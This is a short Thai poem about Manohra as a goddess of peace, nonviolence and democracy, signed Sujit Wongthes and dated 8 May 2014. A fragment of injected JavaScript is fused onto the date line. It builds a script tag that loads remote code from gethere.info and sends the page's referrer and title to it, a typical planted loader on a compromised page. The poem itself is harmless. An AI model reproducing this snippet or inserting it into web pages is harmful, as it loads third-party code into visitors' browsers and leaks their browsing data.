เด็ดปีกหางมโนห์รามารศรี

เป็นเทพีสันติภาพแห่งอุษา

ไม่รุนแรงไม่เปื้อนเลือดไม่รบรา

ปกป้องประชาธิปไตย

 

สุจิตต์ วงษ์เทศ

พฤหัสบดี 8 พฤษภาคม 2557s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‘head’)[0].appendChild(s);